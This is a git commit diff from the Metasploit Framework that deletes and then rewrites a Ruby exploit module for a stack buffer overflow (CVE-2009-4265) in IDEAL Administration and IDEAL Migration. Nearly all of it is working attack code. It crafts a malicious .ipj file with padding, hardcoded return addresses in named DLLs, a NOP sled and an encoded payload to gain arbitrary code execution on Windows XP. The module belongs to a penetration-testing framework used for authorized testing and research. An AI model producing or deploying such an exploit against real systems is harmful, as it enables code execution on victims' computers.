ugh

git-svn-id: file:///home/svn/framework3/trunk@9277 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-11 00:24:11 +00:00
parent cdc591488c
commit 5b514b350d
2 changed files with 38 additions and 92 deletions
@@ -1,80 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = GreatRanking
-
-	include Msf::Exploit::FILEFORMAT
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'IDEAL Administration 2009 Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a stack buffer overflow in IDEAL Administration v9.7.
-				By creating a specially crafted ipj file, an an attacker may be able
-				to execute arbitrary code.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'Dr_IDE', 'dookie', ],
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2009-4265' ],
-					[ 'OSVDB', '60681' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ]
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'seh',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 1000,
-					'BadChars' => "\x00\x3c\x22\x3e\x1a\x0a",
-					'StackAdjustment' => -3500,
-				},
-			'Platform' => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # CALL EBP in ListWmi.dll
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Dec 05 2009',
-			'DefaultTarget'  => 0))
-
-		register_options(
-			[
-				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.ipj']),
-			], self.class)
-	end
-
-	def exploit
-
-		sploit =  "\x0D\x0A\x5B\x47\x72\x6F\x75\x70\x2C\x45\x78\x70\x6F"
-		sploit << "\x72\x74\x2C\x59\x65\x73\x5D\x0D\x0A"
-		sploit << "\x43\x6f\x6d\x70\x75\x74\x65\x72\x3D"
-		sploit << rand_text_alpha_upper(2420)
-		sploit << [target.ret].pack('V')
-		sploit << make_nops(300)
-		sploit << payload.encoded
-		sploit << "\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A"
-
-		ipj = sploit
-
-		print_status("Creating '#{datastore['FILENAME']}' file ...")
-
-		file_create(ipj)
-
-	end
-
-end
@@ -18,20 +18,27 @@ class Metasploit3 < Msf::Exploit::Remote

 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'IDEAL Administration 2009 Buffer Overflow',
+			'Name'           => 'PointDev IDEAL Migration Buffer Overflow',
 			'Description'    => %q{
-					This module exploits a stack buffer overflow in IDEAL Administration v9.7.
+					This module exploits a stack buffer overflow in versions v9.7
+				through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
+				IDEAL Migration. All versions are suspected to be vulnerable.
 				By creating a specially crafted ipj file, an an attacker may be able
 				to execute arbitrary code.
+
+				NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
 			},
 			'License'        => MSF_LICENSE,
-			'Author'         => [ 'Dr_IDE', 'dookie', ],
+			'Author'         => [ 'Dr_IDE', 'dookie', 'jduck' ],
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'CVE', '2009-4265' ],
 					[ 'OSVDB', '60681' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ]
+					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/12403' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/12404' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/12540' ]
 				],
 			'DefaultOptions' =>
 				{
@@ -40,13 +47,27 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'Space'    => 1000,
-					'BadChars' => "\x00\x3c\x22\x3e\x1a\x0a",
+					'BadChars' => "\x00\x0a\x1a\x22\x3c\x3e",
 					'StackAdjustment' => -3500,
+					'DisableNops' => true
 				},
 			'Platform' => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # CALL EBP in ListWmi.dll
+					[ 'IDEAL Migration <= 4.5.1 on Windows XP',
+						{
+							'Ret' => 0x1001411e # CALL EBP in ULMigration_us.dll
+							# 'Ret' => 0x7c96bf33 # JMP ESP in ULMigration_us.dll (from Blake)
+							# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
+						}
+					],
+
+					[ 'IDEAL Administration <= 10.5 on Windows XP',
+						{
+							'Ret' => 0x10010F2E # CALL EBP in ListWmi.dll
+							# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
+						}
+					],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Dec 05 2009',
@@ -60,16 +81,21 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit

-		sploit =  "\x0D\x0A\x5B\x47\x72\x6F\x75\x70\x2C\x45\x78\x70\x6F"
-		sploit << "\x72\x74\x2C\x59\x65\x73\x5D\x0D\x0A"
-		sploit << "\x43\x6f\x6d\x70\x75\x74\x65\x72\x3D"
+		ipj = "\r\n"
+		ipj << "[Group,Export,Yes]\r\n"
+		ipj << "Computer="
+
+		sploit = ""
 		sploit << rand_text_alpha_upper(2420)
 		sploit << [target.ret].pack('V')
-		sploit << make_nops(300)
+		# These nops are required to move the payload below where ebp points
+		# when returning...
+		sploit << make_nops(768)
 		sploit << payload.encoded
-		sploit << "\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A"

-		ipj = sploit
+		ipj << sploit
+		ipj << "\r\n"
+		ipj << "[End]\r\n"

 		print_status("Creating '#{datastore['FILENAME']}' file ...")